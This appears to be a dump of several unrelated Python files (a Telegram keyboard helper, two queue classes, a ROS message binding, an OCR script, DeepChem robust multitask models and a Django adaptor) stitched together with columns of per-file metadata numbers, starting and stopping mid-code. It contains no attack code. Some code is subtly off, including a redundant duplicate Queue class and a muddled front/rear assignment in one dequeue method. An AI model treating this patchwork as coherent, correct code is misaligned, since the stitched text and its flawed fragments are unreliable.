        # returned None -- keep that contract explicit.
        if not foods:
            return None
        # One button per recognized name, capped at eight.
        buttons = [
            InlineKeyboardButton(
                name,
                callback_data=f"add_product_photo_name_ok_['shopping_list']+{name}")
            for name in foods[:8]
        ]
        if len(buttons) <= 3:
            # Short lists: one button per row.
            inline_kb_full = InlineKeyboardMarkup(row_width=1)
            inline_kb_full.add(*buttons)
        else:
            # Longer lists: two buttons per row; an odd leftover gets its own row.
            inline_kb_full = InlineKeyboardMarkup(row_width=2)
            for i in range(0, len(buttons) - 1, 2):
                inline_kb_full.row(buttons[i], buttons[i + 1])
            if len(buttons) % 2:
                inline_kb_full.add(buttons[-1])
        inline_kb_full.row(reset_button, add_typing_button)
        return inline_kb_full
| 68.876833
| 133
| 0.608549
| 2,506
| 23,487
| 5.258579
| 0.02514
| 0.088026
| 0.092882
| 0.121414
| 0.975641
| 0.975641
| 0.975641
| 0.975641
| 0.975641
| 0.975641
| 0
| 0.012191
| 0.287521
| 23,487
| 340
| 134
| 69.079412
| 0.775308
| 0
| 0
| 0.962848
| 0
| 0
| 0.166567
| 0.111726
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024768
| false
| 0
| 0.003096
| 0
| 0.133127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7802f3e8e4505bd645efceaa0cec4fc07662452
| 3,352
|
py
|
Python
|
data_structure/python/queue2.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
data_structure/python/queue2.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
data_structure/python/queue2.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
#---------------------------------------------------------------
# QUEUE (V2)
#---------------------------------------------------------------
# V0
class Queue(object):
    """Fixed-capacity FIFO queue backed by a Python list.

    Elements are appended at the rear (end of the list) and removed from
    the front (index 0), i.e.::

        dequeue <---- 1, 2, 3 <---- enqueue

    ``enqueue``/``dequeue`` return -1 on overflow/underflow instead of
    raising; on success they return None.
    """

    def __init__(self, limit=10):
        self.queue = []
        self.front = None
        self.rear = None
        self.limit = limit
        self.size = 0

    def __str__(self):
        return ' '.join(str(item) for item in self.queue)

    def isEmpty(self):
        """Return True when the queue holds no elements."""
        return self.size <= 0

    def enqueue(self, data):
        """Append *data* at the rear; return -1 when the queue is full."""
        if self.size >= self.limit:
            return -1  # queue overflow
        self.queue.append(data)
        # First element initializes both indices; otherwise the rear
        # advances to the current size (index of the new last element).
        if self.front is None:
            self.front = self.rear = 0
        else:
            self.rear = self.size
        self.size += 1

    def dequeue(self):
        """Discard the front element; return -1 when the queue is empty.

        NOTE: ``list.pop(0)`` shifts every remaining element, so this is
        O(n) per call.
        """
        if self.isEmpty():
            return -1  # queue underflow
        self.queue.pop(0)
        self.size -= 1
        if self.size == 0:
            self.front = self.rear = 0
        else:
            self.rear = self.size - 1

    def getSize(self):
        """Return the number of stored elements."""
        return self.size
# V1
# https://github.com/yennanliu/Data-Structures-using-Python/blob/master/Queue/Queue.py
class Queue(object):
    """List-based bounded FIFO queue (variant V1, identical contract to V0).

    Overflow/underflow are signalled by a -1 return value rather than an
    exception; successful operations return None.
    """

    def __init__(self, limit=10):
        self.queue = []
        self.front = None
        self.rear = None
        self.limit = limit
        self.size = 0

    def __str__(self):
        parts = [str(element) for element in self.queue]
        return ' '.join(parts)

    def isEmpty(self):
        """Whether the queue currently holds nothing."""
        return self.size <= 0

    def enqueue(self, data):
        """Add *data* at the rear end; -1 signals a full queue."""
        if self.size >= self.limit:
            return -1  # queue overflow
        self.queue.append(data)
        # Track front/rear indices: both start at 0 on the first insert,
        # afterwards rear points at the newly appended slot.
        if self.front is None:
            self.front = self.rear = 0
        else:
            self.rear = self.size
        self.size += 1

    def dequeue(self):
        """Remove the front element; -1 signals an empty queue."""
        if self.isEmpty():
            return -1  # queue underflow
        self.queue.pop(0)  # O(n): shifts the remaining elements left
        self.size -= 1
        self.front = self.rear = 0 if self.size == 0 else None or 0
        if self.size != 0:
            self.rear = self.size - 1

    def getSize(self):
        """Current element count."""
        return self.size
# if __name__ == '__main__':
# myQueue = Queue()
# for i in range(10):
# myQueue.enqueue(i)
# print(myQueue)
# print(('Queue Size:',myQueue.getSize()))
# myQueue.dequeue()
# print(myQueue)
# print(('Queue Size:',myQueue.getSize()))
| 27.702479
| 105
| 0.475835
| 416
| 3,352
| 3.776442
| 0.199519
| 0.091661
| 0.034373
| 0.045831
| 0.805856
| 0.805856
| 0.805856
| 0.754933
| 0.754933
| 0.754933
| 0
| 0.022827
| 0.38574
| 3,352
| 121
| 106
| 27.702479
| 0.740165
| 0.267303
| 0
| 1
| 0
| 0
| 0.001007
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0
| 0.090909
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d78c965dfdeec1e3c008f76bacd3f0b435e1cb18
| 3,437
|
py
|
Python
|
alpyro_msgs/tf2_msgs/lookuptransformaction.py
|
rho2/alpyro_msgs
|
b5a680976c40c83df70d61bb2db1de32a1cde8d3
|
[
"MIT"
] | 1
|
2020-12-13T13:07:10.000Z
|
2020-12-13T13:07:10.000Z
|
alpyro_msgs/tf2_msgs/lookuptransformaction.py
|
rho2/alpyro_msgs
|
b5a680976c40c83df70d61bb2db1de32a1cde8d3
|
[
"MIT"
] | null | null | null |
alpyro_msgs/tf2_msgs/lookuptransformaction.py
|
rho2/alpyro_msgs
|
b5a680976c40c83df70d61bb2db1de32a1cde8d3
|
[
"MIT"
] | null | null | null |
from typing import Final
from alpyro_msgs import RosMessage
from alpyro_msgs.tf2_msgs.lookuptransformactionfeedback import LookupTransformActionFeedback
from alpyro_msgs.tf2_msgs.lookuptransformactiongoal import LookupTransformActionGoal
from alpyro_msgs.tf2_msgs.lookuptransformactionresult import LookupTransformActionResult
class LookupTransformAction(RosMessage):
    """Static binding for the ROS ``tf2_msgs/LookupTransformAction`` message."""

    # ROS message type name, as used on the wire / in topic negotiation.
    __msg_typ__ = "tf2_msgs/LookupTransformAction"
    # Base64-encoded full (recursively expanded) message definition text.
    # Generated data -- do not edit by hand; presumably produced by the
    # alpyro message generator (TODO confirm).
    __msg_def__ = "dGYyX21zZ3MvTG9va3VwVHJhbnNmb3JtQWN0aW9uR29hbCBhY3Rpb25fZ29hbAogIHN0ZF9tc2dzL0hlYWRlciBoZWFkZXIKICAgIHVpbnQzMiBzZXEKICAgIHRpbWUgc3RhbXAKICAgIHN0cmluZyBmcmFtZV9pZAogIGFjdGlvbmxpYl9tc2dzL0dvYWxJRCBnb2FsX2lkCiAgICB0aW1lIHN0YW1wCiAgICBzdHJpbmcgaWQKICB0ZjJfbXNncy9Mb29rdXBUcmFuc2Zvcm1Hb2FsIGdvYWwKICAgIHN0cmluZyB0YXJnZXRfZnJhbWUKICAgIHN0cmluZyBzb3VyY2VfZnJhbWUKICAgIHRpbWUgc291cmNlX3RpbWUKICAgIGR1cmF0aW9uIHRpbWVvdXQKICAgIHRpbWUgdGFyZ2V0X3RpbWUKICAgIHN0cmluZyBmaXhlZF9mcmFtZQogICAgYm9vbCBhZHZhbmNlZAp0ZjJfbXNncy9Mb29rdXBUcmFuc2Zvcm1BY3Rpb25SZXN1bHQgYWN0aW9uX3Jlc3VsdAogIHN0ZF9tc2dzL0hlYWRlciBoZWFkZXIKICAgIHVpbnQzMiBzZXEKICAgIHRpbWUgc3RhbXAKICAgIHN0cmluZyBmcmFtZV9pZAogIGFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgICB1aW50OCBQRU5ESU5HPTAKICAgIHVpbnQ4IEFDVElWRT0xCiAgICB1aW50OCBQUkVFTVBURUQ9MgogICAgdWludDggU1VDQ0VFREVEPTMKICAgIHVpbnQ4IEFCT1JURUQ9NAogICAgdWludDggUkVKRUNURUQ9NQogICAgdWludDggUFJFRU1QVElORz02CiAgICB1aW50OCBSRUNBTExJTkc9NwogICAgdWludDggUkVDQUxMRUQ9OAogICAgdWludDggTE9TVD05CiAgICBhY3Rpb25saWJfbXNncy9Hb2FsSUQgZ29hbF9pZAogICAgICB0aW1lIHN0YW1wCiAgICAgIHN0cmluZyBpZAogICAgdWludDggc3RhdHVzCiAgICBzdHJpbmcgdGV4dAogIHRmMl9tc2dzL0xvb2t1cFRyYW5zZm9ybVJlc3VsdCByZXN1bHQKICAgIGdlb21ldHJ5X21zZ3MvVHJhbnNmb3JtU3RhbXBlZCB0cmFuc2Zvcm0KICAgICAgc3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogICAgICAgIHVpbnQzMiBzZXEKICAgICAgICB0aW1lIHN0YW1wCiAgICAgICAgc3RyaW5nIGZyYW1lX2lkCiAgICAgIHN0cmluZyBjaGlsZF9mcmFtZV9pZAogICAgICBnZW9tZXRyeV9tc2dzL1RyYW5zZm9ybSB0cmFuc2Zvcm0KICAgICAgICBnZW9tZXRyeV9tc2dzL1ZlY3RvcjMgdHJhbnNsYXRpb24KICAgICAgICAgIGZsb2F0NjQgeAogICAgICAgICAgZmxvYXQ2NCB5CiAgICAgICAgICBmbG9hdDY0IHoKICAgICAgICBnZW9tZXRyeV9tc2dzL1F1YXRlcm5pb24gcm90YXRpb24KICAgICAgICAgIGZsb2F0NjQgeAogICAgICAgICAgZmxvYXQ2NCB5CiAgICAgICAgICBmbG9hdDY0IHoKICAgICAgICAgIGZsb2F0NjQgdwogICAgdGYyX21zZ3MvVEYyRXJyb3IgZXJyb3IKICAgICAgdWludDggTk9fRVJST1I9MAogICAgICB1aW50OCBMT09LVVBfRVJST1I9MQogICAgICB1aW50OCBDT05ORUNUSVZJVFlfRVJST1I9MgogICAgICB1aW50OCBFWFRSQVBPTEFUSU9OX0VSUk9SPTMKICAgICAgdWludDggSU5WQUxJRF9BUkdVTUVOVF9FUlJPUj00CiAgICAgIHVpbnQ4IFRJTUVPVVRfRVJST1I9NQogICAgICB1aW50OCBUUkFOU0ZPUk1fRVJST1I9NgogICAgICB1aW50OCBlcnJvcgogICAgICBzdHJpbmcgZXJyb3Jfc3RyaW5nCnRmMl9tc2dzL0xvb2t1cFRyYW5zZm9ybUFjdGlvbkZlZWRiYWNrIGFjdGlvbl9mZWVkYmFjawogIHN0ZF9tc2dzL0hlYWRlciBoZWFkZXIKICAgIHVpbnQzMiBzZXEKICAgIHRpbWUgc3RhbXAKICAgIHN0cmluZyBmcmFtZV9pZAogIGFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgICB1aW50OCBQRU5ESU5HPTAKICAgIHVpbnQ4IEFDVElWRT0xCiAgICB1aW50OCBQUkVFTVBURUQ9MgogICAgdWludDggU1VDQ0VFREVEPTMKICAgIHVpbnQ4IEFCT1JURUQ9NAogICAgdWludDggUkVKRUNURUQ9NQogICAgdWludDggUFJFRU1QVElORz02CiAgICB1aW50OCBSRUNBTExJTkc9NwogICAgdWludDggUkVDQUxMRUQ9OAogICAgdWludDggTE9TVD05CiAgICBhY3Rpb25saWJfbXNncy9Hb2FsSUQgZ29hbF9pZAogICAgICB0aW1lIHN0YW1wCiAgICAgIHN0cmluZyBpZAogICAgdWludDggc3RhdHVzCiAgICBzdHJpbmcgdGV4dAogIHRmMl9tc2dzL0xvb2t1cFRyYW5zZm9ybUZlZWRiYWNrIGZlZWRiYWNrCgo="
    # MD5 of the message definition, used for type compatibility checks.
    __md5_sum__ = "7ee01ba91a56c2245c610992dbaa3c37"

    # Standard actionlib triplet: goal, result and feedback sub-messages.
    action_goal: LookupTransformActionGoal
    action_result: LookupTransformActionResult
    action_feedback: LookupTransformActionFeedback
| 214.8125
| 2,830
| 0.978179
| 56
| 3,437
| 59.571429
| 0.428571
| 0.01199
| 0.016787
| 0.015288
| 0.018885
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102216
| 0.015129
| 3,437
| 15
| 2,831
| 229.133333
| 0.883309
| 0
| 0
| 0
| 0
| 0
| 0.836194
| 0.836194
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.416667
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d797a48a61e35fa1c45ee76feebc7fb386692a9b
| 162
|
py
|
Python
|
ocr.py
|
Arjitg450/Python-Programs
|
0630422c9002632a91b5ccf75f6cd02308c6e929
|
[
"MIT"
] | null | null | null |
ocr.py
|
Arjitg450/Python-Programs
|
0630422c9002632a91b5ccf75f6cd02308c6e929
|
[
"MIT"
] | null | null | null |
ocr.py
|
Arjitg450/Python-Programs
|
0630422c9002632a91b5ccf75f6cd02308c6e929
|
[
"MIT"
] | null | null | null |
import Image
from tesseract import image_to_string

# Path of the image to run through OCR.
IMAGE_PATH = 'E:\\aa.png'

# Open the file once and reuse the handle -- the original opened the same
# image twice for the two OCR passes.
image = Image.open(IMAGE_PATH)
# Default-language pass, then an explicit English pass.
print(image_to_string(image))
print(image_to_string(image, lang='eng'))
| 27
| 60
| 0.753086
| 28
| 162
| 4.142857
| 0.464286
| 0.181034
| 0.336207
| 0.310345
| 0.568966
| 0.568966
| 0.568966
| 0.568966
| 0.568966
| 0
| 0
| 0
| 0.061728
| 162
| 5
| 61
| 32.4
| 0.763158
| 0
| 0
| 0
| 0
| 0
| 0.141975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
ad26032e2d7aa9cfd81dde5d53fd45a9151f8a95
| 13,696
|
py
|
Python
|
deepchem/models/tensorflow_models/robust_multitask.py
|
0ut0fcontrol/deepchem
|
a680cc126c8b057aa4727b74a7bd175ad8457ef3
|
[
"MIT"
] | null | null | null |
deepchem/models/tensorflow_models/robust_multitask.py
|
0ut0fcontrol/deepchem
|
a680cc126c8b057aa4727b74a7bd175ad8457ef3
|
[
"MIT"
] | null | null | null |
deepchem/models/tensorflow_models/robust_multitask.py
|
0ut0fcontrol/deepchem
|
a680cc126c8b057aa4727b74a7bd175ad8457ef3
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import warnings
import numpy as np
import tensorflow as tf
from deepchem.nn import model_ops
from deepchem.models.tensorflow_models import TensorflowGraph
from deepchem.models.tensorflow_models.fcnet import TensorflowMultiTaskClassifier
from deepchem.models.tensorflow_models.fcnet import TensorflowMultiTaskRegressor
class RobustMultitaskClassifier(TensorflowMultiTaskClassifier):
  """Implements a neural network for robust multitasking.

  Key idea is to have bypass layers that feed directly from features to task
  output. Hopefully will allow tasks to route around bad multitasking.
  """

  def __init__(self,
               n_tasks,
               n_features,
               logdir=None,
               bypass_layer_sizes=[100],
               bypass_weight_init_stddevs=[.02],
               bypass_bias_init_consts=[1.],
               bypass_dropouts=[.5],
               **kwargs):
    """Store the per-task bypass-stack configuration, then defer to the
    superclass constructor.

    The four ``bypass_*`` lists must all have the same length (one entry
    per bypass layer); this is enforced in ``build``.
    NOTE(review): mutable default arguments are shared across calls --
    harmless only as long as they are never mutated.
    """
    warnings.warn("RobustMultiTaskClassifier is deprecated. "
                  "Will be removed in DeepChem 1.4.", DeprecationWarning)
    self.bypass_layer_sizes = bypass_layer_sizes
    self.bypass_weight_init_stddevs = bypass_weight_init_stddevs
    self.bypass_bias_init_consts = bypass_bias_init_consts
    self.bypass_dropouts = bypass_dropouts
    super(RobustMultitaskClassifier, self).__init__(n_tasks, n_features, logdir,
                                                    **kwargs)

  def build(self, graph, name_scopes, training):
    """Constructs the graph architecture as specified in its config.

    This method creates the following Placeholders:
      mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
        batch_size x num_features.

    Returns a (output, labels, weights) tuple: per-task logits plus the
    label/weight tensors (drawn from a FIFO queue when ``training``).
    """
    num_features = self.n_features
    placeholder_scope = TensorflowGraph.get_placeholder_scope(
        graph, name_scopes)
    with graph.as_default():
      with placeholder_scope:
        mol_features = tf.placeholder(
            tf.float32, shape=[None, num_features], name='mol_features')

      layer_sizes = self.layer_sizes
      weight_init_stddevs = self.weight_init_stddevs
      bias_init_consts = self.bias_init_consts
      dropouts = self.dropouts
      bypass_layer_sizes = self.bypass_layer_sizes
      bypass_weight_init_stddevs = self.bypass_weight_init_stddevs
      bypass_bias_init_consts = self.bypass_bias_init_consts
      bypass_dropouts = self.bypass_dropouts
      # All per-layer parameter lists must agree in length; the set
      # collapses to a single element exactly when they do.
      lengths_set = {
          len(layer_sizes),
          len(weight_init_stddevs),
          len(bias_init_consts),
          len(dropouts),
      }
      assert len(lengths_set) == 1, "All layer params must have same length."
      num_layers = lengths_set.pop()
      assert num_layers > 0, "Must have some layers defined."
      # Same length check for the bypass-layer configuration.
      bypass_lengths_set = {
          len(bypass_layer_sizes),
          len(bypass_weight_init_stddevs),
          len(bypass_bias_init_consts),
          len(bypass_dropouts),
      }
      assert len(bypass_lengths_set) == 1, (
          "All bypass_layer params" + " must have same length.")
      num_bypass_layers = bypass_lengths_set.pop()

      label_placeholders = self.add_label_placeholders(graph, name_scopes)
      weight_placeholders = self.add_example_weight_placeholders(
          graph, name_scopes)
      if training:
        # During training, features/labels/weights are fed through a
        # small FIFO queue; queue_outputs[0] is the feature tensor.
        graph.queue = tf.FIFOQueue(
            capacity=5,
            dtypes=[tf.float32] *
            (len(label_placeholders) + len(weight_placeholders) + 1))
        graph.enqueue = graph.queue.enqueue(
            [mol_features] + label_placeholders + weight_placeholders)
        queue_outputs = graph.queue.dequeue()
        labels = queue_outputs[1:len(label_placeholders) + 1]
        weights = queue_outputs[len(label_placeholders) + 1:]
        prev_layer = queue_outputs[0]
      else:
        labels = label_placeholders
        weights = weight_placeholders
        prev_layer = mol_features

      # Shared multitask trunk: fully connected + ReLU + dropout per layer.
      top_layer = prev_layer  # raw features, kept for the bypass stacks
      prev_layer_size = num_features
      for i in range(num_layers):
        # layer has shape [None, layer_sizes[i]]
        print("Adding weights of shape %s" % str(
            [prev_layer_size, layer_sizes[i]]))
        layer = tf.nn.relu(
            model_ops.fully_connected_layer(
                tensor=prev_layer,
                size=layer_sizes[i],
                weight_init=tf.truncated_normal(
                    shape=[prev_layer_size, layer_sizes[i]],
                    stddev=weight_init_stddevs[i]),
                bias_init=tf.constant(
                    value=bias_init_consts[i], shape=[layer_sizes[i]])))
        layer = model_ops.dropout(layer, dropouts[i], training)
        prev_layer = layer
        prev_layer_size = layer_sizes[i]

      output = []
      # top_multitask_layer has shape [None, layer_sizes[-1]]
      top_multitask_layer = prev_layer
      # One output head per task: an optional bypass stack from the raw
      # features, concatenated with the shared trunk output.
      for task in range(self.n_tasks):
        # TODO(rbharath): Might want to make it feasible to have multiple
        # bypass layers.
        # Construct task bypass layer
        prev_bypass_layer = top_layer
        prev_bypass_layer_size = num_features
        for i in range(num_bypass_layers):
          # bypass_layer has shape [None, bypass_layer_sizes[i]]
          print("Adding bypass weights of shape %s" % str(
              [prev_bypass_layer_size, bypass_layer_sizes[i]]))
          bypass_layer = tf.nn.relu(
              model_ops.fully_connected_layer(
                  tensor=prev_bypass_layer,
                  size=bypass_layer_sizes[i],
                  weight_init=tf.truncated_normal(
                      shape=[prev_bypass_layer_size, bypass_layer_sizes[i]],
                      stddev=bypass_weight_init_stddevs[i]),
                  bias_init=tf.constant(
                      value=bypass_bias_init_consts[i],
                      shape=[bypass_layer_sizes[i]])))
          bypass_layer = model_ops.dropout(bypass_layer, bypass_dropouts[i],
                                           training)
          prev_bypass_layer = bypass_layer
          prev_bypass_layer_size = bypass_layer_sizes[i]
        top_bypass_layer = prev_bypass_layer
        if num_bypass_layers > 0:
          # task_layer has shape [None, layer_sizes[-1] + bypass_layer_sizes[-1]]
          task_layer = tf.concat(
              axis=1, values=[top_multitask_layer, top_bypass_layer])
          task_layer_size = layer_sizes[-1] + bypass_layer_sizes[-1]
        else:
          task_layer = top_multitask_layer
          task_layer_size = layer_sizes[-1]
        print("Adding output weights of shape %s" % str([task_layer_size, 1]))
        # Binary classification head: two logits per task.
        output.append(
            model_ops.logits(
                task_layer,
                num_classes=2,
                weight_init=tf.truncated_normal(
                    shape=[task_layer_size, 2], stddev=weight_init_stddevs[-1]),
                bias_init=tf.constant(value=bias_init_consts[-1], shape=[2])))
      return (output, labels, weights)
class RobustMultitaskRegressor(TensorflowMultiTaskRegressor):
  """Implements a neural network for robust multitasking.

  Key idea is to have bypass layers that feed directly from features to task
  output. Hopefully will allow tasks to route around bad multitasking.
  """

  def __init__(self,
               n_tasks,
               n_features,
               logdir=None,
               bypass_layer_sizes=[100],
               bypass_weight_init_stddevs=[.02],
               bypass_bias_init_consts=[1.],
               bypass_dropouts=[.5],
               **kwargs):
    """Store the per-task bypass-stack configuration, then defer to the
    superclass constructor.

    The four ``bypass_*`` lists must all have the same length (one entry
    per bypass layer); this is enforced in ``build``.
    NOTE(review): mutable default arguments are shared across calls --
    harmless only as long as they are never mutated.
    """
    warnings.warn("RobustMultiTaskRegressor is deprecated. "
                  "Will be removed in DeepChem 1.4.", DeprecationWarning)
    self.bypass_layer_sizes = bypass_layer_sizes
    self.bypass_weight_init_stddevs = bypass_weight_init_stddevs
    self.bypass_bias_init_consts = bypass_bias_init_consts
    self.bypass_dropouts = bypass_dropouts
    super(RobustMultitaskRegressor, self).__init__(n_tasks, n_features, logdir,
                                                   **kwargs)

  def build(self, graph, name_scopes, training):
    """Constructs the graph architecture as specified in its config.

    This method creates the following Placeholders:
      mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
        batch_size x num_features.

    Returns a (output, labels, weights) tuple: one scalar regression output
    per task plus the label/weight tensors (drawn from a FIFO queue when
    ``training``).
    """
    num_features = self.n_features
    placeholder_scope = TensorflowGraph.get_placeholder_scope(
        graph, name_scopes)
    with graph.as_default():
      with placeholder_scope:
        mol_features = tf.placeholder(
            tf.float32, shape=[None, num_features], name='mol_features')

      layer_sizes = self.layer_sizes
      weight_init_stddevs = self.weight_init_stddevs
      bias_init_consts = self.bias_init_consts
      dropouts = self.dropouts
      bypass_layer_sizes = self.bypass_layer_sizes
      bypass_weight_init_stddevs = self.bypass_weight_init_stddevs
      bypass_bias_init_consts = self.bypass_bias_init_consts
      bypass_dropouts = self.bypass_dropouts
      # All per-layer parameter lists must agree in length.
      lengths_set = {
          len(layer_sizes),
          len(weight_init_stddevs),
          len(bias_init_consts),
          len(dropouts),
      }
      assert len(lengths_set) == 1, "All layer params must have same length."
      num_layers = lengths_set.pop()
      assert num_layers > 0, "Must have some layers defined."
      # Same length check for the bypass-layer configuration.
      bypass_lengths_set = {
          len(bypass_layer_sizes),
          len(bypass_weight_init_stddevs),
          len(bypass_bias_init_consts),
          len(bypass_dropouts),
      }
      assert len(bypass_lengths_set) == 1, (
          "All bypass_layer params" + " must have same length.")
      num_bypass_layers = bypass_lengths_set.pop()

      label_placeholders = self.add_label_placeholders(graph, name_scopes)
      weight_placeholders = self.add_example_weight_placeholders(
          graph, name_scopes)
      if training:
        # During training, features/labels/weights come through a FIFO
        # queue; queue_outputs[0] is the feature tensor.
        graph.queue = tf.FIFOQueue(
            capacity=5,
            dtypes=[tf.float32] *
            (len(label_placeholders) + len(weight_placeholders) + 1))
        graph.enqueue = graph.queue.enqueue(
            [mol_features] + label_placeholders + weight_placeholders)
        queue_outputs = graph.queue.dequeue()
        labels = queue_outputs[1:len(label_placeholders) + 1]
        weights = queue_outputs[len(label_placeholders) + 1:]
        prev_layer = queue_outputs[0]
      else:
        labels = label_placeholders
        weights = weight_placeholders
        prev_layer = mol_features

      # Shared multitask trunk: fully connected + ReLU + dropout per layer.
      top_layer = prev_layer  # raw features, kept for the bypass stacks
      prev_layer_size = num_features
      for i in range(num_layers):
        # layer has shape [None, layer_sizes[i]]
        print("Adding weights of shape %s" % str(
            [prev_layer_size, layer_sizes[i]]))
        layer = tf.nn.relu(
            model_ops.fully_connected_layer(
                tensor=prev_layer,
                size=layer_sizes[i],
                weight_init=tf.truncated_normal(
                    shape=[prev_layer_size, layer_sizes[i]],
                    stddev=weight_init_stddevs[i]),
                bias_init=tf.constant(
                    value=bias_init_consts[i], shape=[layer_sizes[i]])))
        layer = model_ops.dropout(layer, dropouts[i], training)
        prev_layer = layer
        prev_layer_size = layer_sizes[i]

      output = []
      # top_multitask_layer has shape [None, layer_sizes[-1]]
      top_multitask_layer = prev_layer
      # One regression head per task: an optional bypass stack from the raw
      # features, concatenated with the shared trunk output.
      for task in range(self.n_tasks):
        # TODO(rbharath): Might want to make it feasible to have multiple
        # bypass layers.
        # Construct task bypass layer
        prev_bypass_layer = top_layer
        prev_bypass_layer_size = num_features
        for i in range(num_bypass_layers):
          # bypass_layer has shape [None, bypass_layer_sizes[i]]
          print("Adding bypass weights of shape %s" % str(
              [prev_bypass_layer_size, bypass_layer_sizes[i]]))
          bypass_layer = tf.nn.relu(
              model_ops.fully_connected_layer(
                  tensor=prev_bypass_layer,
                  size=bypass_layer_sizes[i],
                  weight_init=tf.truncated_normal(
                      shape=[prev_bypass_layer_size, bypass_layer_sizes[i]],
                      stddev=bypass_weight_init_stddevs[i]),
                  bias_init=tf.constant(
                      value=bypass_bias_init_consts[i],
                      shape=[bypass_layer_sizes[i]])))
          bypass_layer = model_ops.dropout(bypass_layer, bypass_dropouts[i],
                                           training)
          prev_bypass_layer = bypass_layer
          prev_bypass_layer_size = bypass_layer_sizes[i]
        top_bypass_layer = prev_bypass_layer
        if num_bypass_layers > 0:
          # task_layer has shape [None, layer_sizes[-1] + bypass_layer_sizes[-1]]
          task_layer = tf.concat(
              axis=1, values=[top_multitask_layer, top_bypass_layer])
          task_layer_size = layer_sizes[-1] + bypass_layer_sizes[-1]
        else:
          task_layer = top_multitask_layer
          task_layer_size = layer_sizes[-1]
        print("Adding output weights of shape %s" % str([task_layer_size, 1]))
        # Single-output regression head; squeeze drops the size-1 column.
        output.append(
            tf.squeeze(
                model_ops.fully_connected_layer(
                    tensor=task_layer,
                    size=1,
                    weight_init=tf.truncated_normal(
                        shape=[task_layer_size, 1],
                        stddev=weight_init_stddevs[-1]),
                    bias_init=tf.constant(
                        value=bias_init_consts[-1], shape=[1])),
                axis=1))
      return (output, labels, weights)
| 41.377644
| 81
| 0.634711
| 1,601
| 13,696
| 5.085572
| 0.110556
| 0.083763
| 0.055023
| 0.039548
| 0.930115
| 0.92594
| 0.921887
| 0.910833
| 0.910833
| 0.899779
| 0
| 0.007473
| 0.286799
| 13,696
| 330
| 82
| 41.50303
| 0.826065
| 0.107477
| 0
| 0.879699
| 0
| 0
| 0.048031
| 0.004037
| 0
| 0
| 0
| 0.006061
| 0.022556
| 1
| 0.015038
| false
| 0.293233
| 0.037594
| 0
| 0.067669
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ad66c38061361102278e016fe22912adfe039512
| 3,160
|
py
|
Python
|
cropwatch/apps/metrics/fields.py
|
objectsyndicate/Crop-Watch
|
c960bbcacc49199e35984dc521cc9e8663a6b972
|
[
"Apache-2.0"
] | 13
|
2018-02-10T14:52:05.000Z
|
2021-08-31T21:21:58.000Z
|
cropwatch/apps/metrics/fields.py
|
objectsyndicate/Crop-Watch
|
c960bbcacc49199e35984dc521cc9e8663a6b972
|
[
"Apache-2.0"
] | 1
|
2019-06-13T15:55:08.000Z
|
2020-07-16T17:35:09.000Z
|
cropwatch/apps/metrics/fields.py
|
objectsyndicate/Crop-Watch
|
c960bbcacc49199e35984dc521cc9e8663a6b972
|
[
"Apache-2.0"
] | 2
|
2018-05-15T14:54:28.000Z
|
2019-05-19T14:59:18.000Z
|
import sys
from django.forms.models import modelform_factory
from inplaceeditform.fields import BaseAdaptorField
from cropwatch.apps.metrics.forms import HabitatManageForm
# Py2/Py3 compatibility aliases: ``string`` for isinstance checks, and a
# ``unicode`` name so later code can call unicode() under Python 3 too.
if sys.version_info[0] != 2:
    string = str
    unicode = str
else:
    string = basestring  # noqa: F821 -- only defined on Python 2
class MyAdaptor(BaseAdaptorField):
    """Inplace-edit adaptor wiring ``HabitatManageForm`` into the field and
    injecting ``request.user`` into the form constructor."""

    MULTIPLIER_HEIGHT = 1.75
    INCREASE_WIDTH = 40

    @property
    def name(self):
        return 'myadaptor'

